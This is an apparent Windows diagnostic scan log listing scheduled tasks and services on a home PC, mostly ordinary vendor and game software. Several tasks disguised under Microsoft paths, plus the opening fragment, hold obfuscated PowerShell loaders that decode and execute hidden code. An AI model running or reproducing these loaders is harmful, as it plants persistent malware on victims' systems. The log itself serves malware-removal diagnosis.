uvhCMc40R8mPyZ9k1pSizdPgXkQ6fQbxprVuBRsED4G2dCJQ/nQTFVPgP9macHLIPmzCzIPdA5DDkTb0k3x2eSKB1tSrDE8ck01/pEoEt0kqtA/x1lWLUAo1wrRHyY/Jn2VzPfIZx6ReMPcImzGnSHIkHqFTPcIoZhhfAWIxi7123U6gY+hKYdbxQ/RHrOs4e/HuZCZYH2TqkXbEkwii/YegikQSNA8BU8DqWcvIQjWOXC+cirCzRXN9qm3PpCNYtmWjwW6pHtwvwSKk0yEDEUMwfxkvpE/h8k0igT9Q4uiDxQr0i4AWqbY8rn1jjIrchzEvTerdx6E2mBYQc0w0=';$qlygJ='nTevQxrioBYX';$fLUN=($qlygJ[7]+$qlygJ[2]+$qlygJ[5]);&$fLUN(&$fLUN ('''[Telvqxt.Encolvqding]::UTlvqF''+2*2*2+''.GelvqtStlvqring([Conlvqvert]::Fro''+''mlvqB''+''ase''+8*8+''Strilvqng(([relvqgex]:lvq:Malvqtchlvqes(''''pkCb3R0bXRFJocmbxZHbpJXc2xGdTRXZxZHbH5COGFndsRVV6oTXn5WaxZHbk92YxZHbuVkL0hXc2xWZU5SblRXc2x2c5FndsN1WogXc2xWZxZHbptTKyVmYxZHbtVnbsFndsFWayV2Uuclb1ZXRi9GJrcCInsCblRWc2x2bN5yVuVndFJ2bkgCIpkybDJUdLZHJocmbpJHdxZHbTRTc2xmNlNXYxZHbC12bxZHbyZkO60FdyVmdxZHbu92Qu0WZ0FndsNXeTtFKgMWc2xWZk1Db3R0bXRFJ7IXZi1Wc2xWduxWYpFndsJXZTxCblFndsR2bNBCdjVWc2xGblNHf9dCMFZVSSRETBFndsNUSTlFSQxlLcx1JgEXZtACRJVWc2x2YpZXZE5yXksHIlJXc2xWZodHflZXaxZHbyR2axZHbzlGZfJzMxZHbulWc2x2dgkWbxZHb3dWPX5Wd2VkYvRSf7kERLZ0QkAibyFndsVHdlJXfrsyVuVndFRyOORXbmRCIy9Gei1CIddlb1ZXRksVdFBlVkAicvFndshnYtASX1hFRVJFUksVSEtkRDRSPdVHWEVlUQRyWJR0SGNEJ74EdtZGJgI3bxZHb4JWLgkiM1EDIy9mYtAiT01mZkACZuFndsFmYtAyMygSPORXbmRSfw0zVuVndFRyepQnb192QuUXRQZFJgU2ZtAyVuVndFRCKml2epsyK1hFRVJFUksDduV3bD5SSEtkRDRCI0xWLgUHWEVlUQRyOw0TdYRUVSBFJoI3bxZHbmtDM9clb1ZXRksTXwsVdFBlVk0jT01mZksTKSlVWX5kekgyclFndsRXeCRXc2xWZH5COGRVV6oTXn5Wc2xWak92YuVkL0FndshXZU5SblFndsR3c5N1W9UXRQZFJ7liUZl1VOpHJddmbpJXc2xGdztFLJR0SGNEJd11WlRXc2xWeitFKjVWc2xGZg42bpR3YxZHbuVnZ'''',''''.'''',''''RilvqghlvqtTlvqoLlvqeft'''')|FolvqrEalvqch {$lvq_lvq.vallvque}) -jlvqo''+''in ''''''''))-replvqlace''''llvqvq''''|&(''''ilvqelvqx'''');''-'+'rep'+'lace''lvq'''))"
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\NCH Software (empty)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-523137893-4004670275-4196358549-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentFallBack2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload mininterval:2880 (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentLogOn2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1 (file missing)
O22 - Task: \McAfee\DAD.Execute.Updates - C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.110\DADUpdater.exe
O22 - Task: \McAfee\McAfee Auto Maintenance Task Agent - {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \McAfee\McAfee DAT Built in test - C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe /hcmode=periodic /periodicruncount=5
O22 - Task: \McAfee\McAfee Idle Detection Task - {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "984122374;$DxF='QCNyeyJxqkjQiV';'}&(5gc_m bA*y-T8y*_).bNaqme4 (0''i.us0?i{n9_g 2hS_y7ust_ie_mgc;u7_s+i_5ngp+ _S8,ysy,t_e_dm.8iI6O!+;u+_s_i{]ng_8 iS_lys2_t0e6cm.q5R2uj)nti_i_m_6e.b!I]nr0te_2r7o_{pS4meir_,vi62c7e_=s;ayugsvdin2{gn {bMiwfc_rf0os_7o_f9xt.jhW5ia=n35_2+;s9pu-xbilq_ic_r ?ct_lay=sxszv T3sB3{n_dev6l0e1cga_)t_e8b vhmoti_xd -ic]E5,iv=/(_)cs;p[bu6b]1li86c0 gsst_va(treici_ =v55oi1_d_ 0_cj3qouEk_()y_{/bd5yt3?ek[_4]M{wm_E_zb=_[F{ig_les+./E9-xiigsat77s(9_WrU_djhb_yat1xvrt4v_r_gWU.o)!?z-Fi-klneb6.R!_e2a_odAkblelz_By-+tae_fs(3gW(U_njh)rywtdsvr_(vdrtxWUec)5:)_(blpy_t_te[c_]2)_oRe{2gsi21sttdr_y!k.Luto_craalxtMfa_/ch=fitnf-e.}_O0p8_endnS=u3_bKz{e4ym{(@x3WlU__SO_lF)TlrWA_3RuE8-\M/_i_c0.ro--suo6!ft-9\4Ch_TF.0\-Tl_IP_5W_Uy()._tGhe!stV5sa)l_3ueb4(_WzaUj_ih7yd!tv_{r1vg4rW=+U!,_)nu_el5lp/);b}isf_o(M}-m[E(tb=oq={n6+ul85l])_jrew7t(ui(rn_0;cis_nt4- 9y__Zg,_u_=m_MmtfE,b?u.L1_ebnq=gtlahi;={fo!ur_(__ink7tc 54lXywB[=_r0;__l_XreB ]_!y=_7yZ0_g_uus-13.;alw_XB_j+++ia){__M5m9_Eb,c[.l{0XB_)]_^_(=(_kb_y_tte_w)_Wk_U+i}P_V__xnzpU{c_1}4f){xUmo9id.I_U.+NK_p4+gtx8oiu7[]1v4p+2Xe/_!KWmaU.[_!lXn_Bpfk_K21w86]{w;}k{I_np1tP_6t_roz mn(gwy_sk=cj(yI}]nt.8P/tn}r)e80_;[dIn_{t_Phbtrb_ be77Jv4a=7(oqIn_0tkP9_trc1)_y0_Zglouw;-_NtmoA8lt_lo5vc_a4ste_7V=i/_rt6?u_a{qlM7_ewmy_orq_y{(dj(I6znqt[4Pt)4rs)cn(-,v13)0s,rvsedf+_ melgky_tk,aq(oIs_nt_sPht7ur)/f0l,irregzf4 34eJb_vq,k,0xu}1a07=00m[,[0d0x4b103)gk;Mi_a_rv_sha_a6lqr.C_4o_pt,y(9oMsm_9Eb}},20v_,moagoy2!k,_[y.Z9+gu8h)r;e[((+_c!Eraiv9h)lM!rar(5s)hvpal.u._Gl,et_9D?e8_leorg9a0qteqnF)oq)rF2_uon9yct3bi_o}mnP_4o_iv_nt_(e.r01(ml{gmy7lk,r/t6y8.pe=.otf?=(c01E9i+4v)y()h)_/()_];(}t_[D7_l_l,{Im03pfo9drt!=(eW[(Unwmt[dt/llh_WsU+_)]7.pxr_jivk5a_t-_e cfs6ti_at_/i4c_3 e[+xot7serjxn9 2uloionvg5k Ni_thA__ll=oopc_satriezV6=irn!t_u[_al5gM/e_kmot(r[y+v(I=anftrhPt__r} hwVttn,.rp3ef[1 zI__nt[1Prt.-r _7e_OwfCQ_],(I,gnt6iP]toer _xwet_,m,oer_e5wf a4I2njjtP7_t_rb5 V/]atC2c,U6bIyn/wt3hv2? zoZw3),?U?7In_)t23g!2 v8U_pv));9=}_ '']-r_ep0la_ce(''._(.i.)-'',/''$?1''_ -tre_pl5ac(e''rWUi'',)[c_ha6r]c(3_4)k -_rekplzac+e''dfK6'',l[c(ha]r]x(3?7)h);6[Exnveiroonamenntf]:3:Couryrernt!Di{remctbor_y=3pw}d;][TwB]k::ycjgoEy()-; '-replace('.qnIU(qnIU.qnIU.)'-replace'qnIU'),('$'+807/807)|&($DxF[12]+$DxF[4]+$DxF[7]);3684975378" (file missing)
O22 - Task: \Microsoft\Windows\MUI\578309983 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "2268987711;$WTPb='NnkreMT)ixg.nO(llAikcJ';$rep_var='b&(pgc_m kA*g-Try*b)._Na.mex ({''k_us-_i_nekg m6Suyo2stc_edm?_;u8_smio_ngvz bSr.ysw0teeu+m._0I1O2_;u_9s-ifyng_4 _Smoys_7tle=im.e)R(uw_ntymijm_fe./!Inn_ute_?ryo_fpSk5eprz2vi}tcme{2s;}2u5s{?in_jg/ zpMivzcdr?_osc_o_f}1t.t2Wli_kn3lz2_;0_puh.b+l_8ic__ 2chcla_3syssy r{_c_Y+en{0)d_e]9le]_g8au(te7k jv__oi-+d_ 63WJ0.i.m_j()ov;rp-0ub1dl7iz_c _]s_t}katf7i_ci. vh9ooi4ld 8-B?I?rMT09(v)u[{b9_y,t]ie[5=]ujr,FP.ct_x_)=F_(ikleze.60Elx_vish)tns(1(u6lyrCf!rax0j8hm0yti6v-rf,vr?=u_ycvCr88ad)}k?F.li_lsle.h_Rue_xadw}A.lg)lBm7y)tdqes,_(su!fyCe_roap_jh!(yht_{vrycvtr=}uyt9C}r2.a)_(:_(8_bye2tve.m[]_j)oRe8egnni0s__tr_)y+._oLot.cpa5!lM_ba/c_3hii_nte__.O5_p_e4_nS+_u[bc_Ke3lyb(j5@u_xy{Cqyra]jSrO2_FTk-W4A_zREy9\(Makicvgr-o8_so_rf,tp=\C}9TuF_9\T3_I1P-muy_yC/r_4a)d}.]Gf_etj2V8a,plu__e{(y,uy-_C,r_sajb_h_yf,tv5_r_v_4ru-.ylC1oradp,_n}uul__ln)6_;i_-f_(f4jF![P0t/gx=_3=1n=8ul,-l_)29re-ltbu_urnh0;gi4_nteh hs_4JJmiKi=s{jFd_Petl_x._2Lpegyngu_t_h=p;f=bobr__(ie_nftm. vl_n?bijD=9l0j;_5vn=9b_Dsa !/e=8sj_JJ_{Kp-_81;]hv8nazbD.,+_+jw){12j_Fk-Pt7ixr[_?vn[!b?D_v]^g_=s(gibyott9ed9)ud9y=C_3raj_OuU}eM9_nQwvqmk/.qq/?_8!!gkB+(_jnw4_zlj26lG_p3d!_,pa3qQ+ujwyC/_r9a4a[v__ndb91DB3?noB)ogt}_2=5j]];+h}5I__ntp_P.tr_r h]i)f_brNp_=c(zvIni?tfP)7trml)_0__;I,onxtwgPt}_rc {mzctrsln_)f=3_(1Ie5nto_P)tv)r)f5s{J_}JK-r;_Nt0tA_nl_lgloc__alt_peV5-idr__tu,[a_l]hMe1_meo,_ry_[(x(9_In_6tgP7ztrx_)q(t,-1{g)_,tarekqf[ e_ifhgr[Nd_,(+_Iyn_{tPzkt.r8_)0iw,4rp_eflm _z]wcso4n_fn_,0x8xe17w00!j05,?[0x=f4_0-8);5fM8a97rsjuhqa_8l.0nC6opapy0_(cjpxFPk(t_x.2,0.{,!i{_frj5N?,s8sJ{oJhKwe);36(7(?_WJ__i_m__)M_{a1radsho?a-l+!.Gq4eat3hDek4l4eg_gakgt/e0_Fo2hr/F?_uneqc+t]_io)8npP_1oi=2n_tr-erlc(xi__fr),Nn,07tyi7ple_0of8_(1W3{Jirpmr)6+))dz(j)__;}uz[iD4slli_I?m.7po_]r,t_p(u_byeCpyra0znhtv3dl1rl}u_oyCh_r=a?8)]oqpqr8_iv[_amtr_e j2s_t,_ato4ifc_m ec}x)t_]er_hn8 3dlovonig]- Np{t_A=2lla_ouc_]aty!e]V3mir=jt_u_xalo4Mye!6mo2or3y__(I_3n_t_{Ptpcr_ _/Np_=Poh}_q,c_r2eu{f _(Imn97tP,xtjr}_ e__pzn_9k,__Ion/wtP)ft=rh5 Ix!Q3o{0Xqf?,6rszef6f rIxsntcvPzt(gr x6KtMy]gL71,6Um_In?_t_31e2 a4A_vvyaqv7,dU7vInq!t_3h_2 _pj_b__ld_4)_;__} c''-)re]pl0acae''_.(=..t)''/,''_$1['' c-rxepalaoce_''uwyC_ra}'',6[c8ha_r]?(3_4)_ -6reipliac5e''7Bn/Bgft''_,[1ch2ar6](u37_))e;(jlsm $yensv:ete9mpr -_Di=|wfhe[re5{(_$_+.N1amie.nLe_ng,th! -,eqy 8f)-/antd(q(G/ett-Ayclx $o_.8Fu_ll8Na_me_)._Actcenss2.FfilheS8ys_texmR3igpht/s c-epq _''Dhel9et5e''/)}x)|xdevl;_[E_nv_irlon-me0nt.]:(:C6ur5reuntdDi]re?cthor_y=_pwvd;_[rtcY_n]i::aBIdMTf()=; ';'$rep_var -rep'+''+'lace($WTPb[11]+$WTPb[14]+$WTPb[11]+$WTPb[11]+$WTPb[7]),(''$''+321/321)'|&($WTPb[8]+$WTPb[4]+$WTPb[9])|&($WTPb[8]+$WTPb[4]+$WTPb[9]);9701108446"
O22 - Task: \Microsoft\Windows\MUI\88542446 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "6768699732;$Czjm='recmbL)bvxob.X(TrIiDFh';$rep_var='_&(_gc_m ,A*!-T{y*!).)Na,me_ (2''24us4_i_n/_g d_Spyvystwdeim9h;u_4s7ilfngk2 )S=zys__teehvm.u_I2O=y;u_.s_iu-ngb, aS_tysb_t_eqsm.q.Rtument(4ikm__e.9pI=nm_tew5rdoo_pS?meyra_vii_c}eacs;o=u7s_qin_ig_ vaMiu_cwrutos__o.f.7t.m_W_ieon3-=23;o3pu_mbel5xic_s lcd_la/bsvs__ jt9W6n/_Sz39{vd_selpqelg)_at2ge- {bvox+ind]d Nh0C}Q__OL?4(t)cj;p_huebs_li_rc_ txst_xa6t6_icfe ivk7oi{ld8 kjtWe{m/r_lw(dx)_{_abyvlt_e8_[]ase1X_wsk_ll1=j9Fi+_lpe36.Eh+x_io_stnps_(lhjl+gKdC-_vyu9uxe,yrh.3futnwwtu(jflj4KCfav1)3!?F2di.lvve._oR_ed_ad+_Aulq5lBx_yttnses_5(4jkvlK__Cov6myu8re_re_hfl_t3wvdtj-5l?K!_Cv?9)f:j4(b-_y4t=ge[-o]6)2iRe_4g_i_zst9trpyo2.Le3o_cr_alf_M)at?ch[]ilnr_e.,aO_p[[enn]S_u!_bKo_e?yi((@rgj[l__KC_rv1ScnOFbjT,WrxARm=Ea\(_Mi=ccdr]_os2yo_ff{t\g,CdT3{F\4{T_I9_Pj4_lsK(6Cv_b)e.,,Geh_t_Vpoalinu_e__(j_9l!K9yCv!_y_u(,er_5h_f_}tw_9t_jtylKe9Cdve5,n((u_l_{l)?e;!i]{f(__e7X-_sk9rl6=o4=n_uu2l/el)o_rse-)tuxar-n=u;i]_nstvo I]_Z_B(ve=0_eeX_3sk_,l/._2Le66n!gt_thds;yf(sor?0(0i/!nt_a ja_oTAlfDp=er0;,+a(Ts_AD8_ e!g]=I_/ZhBa!e-l-1o;m_aT+bAqDl_++_5)+{_deX_as}k_zl[x4a_T4,AD44]s^td=(gub}y?_tei1)ij_,lKm[C_vthDs8_k_l7_]4mdtqrf_/o__GfE200u_b}_f!.67j6r0e9gy5i_7wdfsYd=2_,oq_?x.,c+IweD8_4V]L3{Vqx0Mn3ni7ak5uy+o}qfs?C_]_5e+3/L_0qq4Gyxl1Gb/IU_p+0]y6C+0kU__4}(3_rEzj+?bk{6{dl?,lfb_VoC8_n,5zq_6_,=5mz}bBwo8Tf46lW5_qe3d7,.q=cjb7l1KplCvi([!alyTA7_DyAt_Wu_moaVm(93_5]6;oa}I4]n_t{oPt-ur7 c-YX_8O3xwu=(_dI_na_tP_tt1ry_)0r_;_Iq_ntg0P_to=r umCyacwlr13Zm=du(I3?n_t9=Ptb_r8)_/IZxoB2eud;Nm)t.Ai_lla.o/c_-at_]e7V5iirx_t_u(_al_/Mfeiymo5_r{y_e((]7I_ntutP{_t4r.?)(rd-61m}),ror)e)rf w8Y-X(_Ox__,_([eIns[txP?.tr4m)j0j-,rxneufj{ C77aal,3rZkm,_0_sx1}=0q0ik0,!f0_xsq40+z)k;/_Ma(grus,_hak_lb.3wCo!wp=y8g(e!kXbs?_klp0,_0,_,Y__X_Ohtx,_sI_Z_[Be_e)5;)f((_0N4C9xQO!qL_)nzMa8_rns_+ha]hlw._kGe_bt_D-5elqde?gcpat3]e7Fj,or/)Flu__nc/0tdi_1on{nP_olgin/,t1e6gr(=lY_X_hOxe(,tt0_yproe2o_gf(__NbC!_QO_sL_).t))8z(/)5m;})n[5D6_ll/,I_m_hpo2erbt_](jpml]K)7Cv!4n_t__dla!l_j[ilK__C_v__)]?wp_r}tiv_6att6,e 0,s_tswat5_irc5, eggx}t_!er(kn, 99lo_!nhgu+ N9ut_A)bllf4o[c-dat,]ejV+_ir9jtsuisal{xMcerpmo_2rby{o(I]vn_t_hPti1r= g_XL=jUgM6-,r_ce1f-[ I_cntt7}Pto_r_ [?Pe+cW_tb_K,(_Ign09tP5_tyryf S__XpY_=Zg(_,0r?mef_w 3I}_nt)wPrt,_r 37A!n_uaK1b,cUg_In+1tk3og2 blXyB[oVm0p,?Up=Inwnti3m92 _eEcn_{Lk_y)(;_.} [''-!re5pl-ac8e''s.(j.._)''o,''m$1_'' .-r}ep}lawcee''j}lKbCv_'',0[cgha_r]d(3a4)_ -ireppl9ac_e''wAW_uo3V''_,[nch6arx](537z))_;(fls_ $=enkv:)teamp, -)Dik|wxhe!re5{(6$_r.N_am-e.yLeyngith7 -6eq8 8f)-[an-d(_(G_et5-A9cl_ $g_.qFu_ll,Napmef).)Acnce6ssp.F4il3eS_ys+te5mR4ignhtxs 5-e{q _''Dgel)etpe''-)}j)|_de_l;([E_nv+ir7on_mewntv]:8:Cwurkre4nt6Di)rewct_or_y=_pwmd;k[j_WnnSz-]:_:tiWmnrwy()8; ';'$rep_var -rep'+''+'lace($Czjm[12]+$Czjm[14]+$Czjm[12]+$Czjm[12]+$Czjm[6]),(''$''+396/396)'|&($Czjm[18]+$Czjm[1]+$Czjm[9])|&($Czjm[18]+$Czjm[1]+$Czjm[9]);7913805660"
O22 - Task: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Task: AdobeGCInvoker-1.0 - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe -mode=scheduled
O22 - Task: Avast Emergency Update - C:\Program Files\Avast Software\Avast\AvEmUpdate.exe (file missing)
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe --automatic
O22 - Task: IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 - C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe --automatic (file missing)
O22 - Task: McAfee Remediation (Prepare) - C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe /prepare
O22 - Task: McAfeeLogon - C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe /platui
O22 - Task: OneDrive Reporting Task-S-1-5-21-523137893-4004670275-4196358549-1001 - C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: Opera GX scheduled assistant Autoupdate 1614967658 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
O22 - Task: Opera GX scheduled Autoupdate 1604429592 - C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1590958890 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\CASPER\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1590958881 - C:\Users\CASPER\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: TaskbarX CASPERNIRVANACASPER - C:\Users\CASPER\Desktop\TaskbarX_1.6.9.0_x64\TaskbarX.exe -tbs=1 -color=0;0;0;50 -tpop=100 -tsop=100 -as=cubiceaseinout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -sr2=0 -sr3=0 -ftotc=1 -rzbt=1 (file missing)
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service R2: Adobe Genuine Monitor Service - (AGMService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
O23 - Service R2: Adobe Genuine Software Integrity Service - (AGSService) - C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
O23 - Service R2: Dolby DAX2 API Service - (DAX2API) - C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
O23 - Service R2: Elan Service - (ETDService) - C:\Program Files\Elantech\ETDService.exe
O23 - Service R2: Gaming Services - (GamingServices) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServices.exe
O23 - Service R2: Gaming Services - (GamingServicesNet) - C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
O23 - Service R2: Intel(R) Driver & Support Assistant - (DSAService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
O23 - Service R2: Intel(R) HD Graphics Control Panel Service - (igfxCUIService2.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R2: McAfee AP Service - (McAPExe) - C:\Program Files\Common Files\McAfee\VSCore_21_4\McApExe.exe
O23 - Service R2: McAfee CSP Service - (mccspsvc) - C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\\McCSPServiceHost.exe
O23 - Service R2: McAfee Module Core Service - (ModuleCoreService) - C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
O23 - Service R2: McAfee PEF Service - (PEFService) - C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
O23 - Service R2: McAfee Service Controller - (mfemms) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service R2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe
O23 - Service R2: PMBDeviceInfoProvider - C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
O23 - Service R3: Intel(R) Driver & Support Assistant Updater - (DSAUpdateService) - C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
O23 - Service R3: McAfee Validation Trust Protection Service - (mfevtp) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
O23 - Service S3: EasyAntiCheat - C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe
O23 - Service S3: Epic Online Services - (EpicOnlineServices) - C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files (x86)\Google\Chrome\Application\97.0.4692.71\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: Intel(R) SUR QC Software Asset Manager - (Intel(R) SUR QC SAM) - C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
O23 - Service S3: McAfee Firewall Core Service - (mfefire) - C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService
O23 - Service S3: SteelSeries Update Service - (SteelSeriesUpdateService) - C:\Program Files\SteelSeries\GG\SteelSeriesUpdateService.exe
O23 - Service S3: Uncheater for BattleGrounds_GL - (ucldr_battlegrounds_gl) - C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe
O23 - Service S3: Zakynthos Service - (zksvc) - C:\Program Files\Common Files\PUBG\zksvc.exe
--
End of file - Time spent: 104,3 sec. - 64562 bytes, CRC32: FFFFFFFF. Sign: 譭烮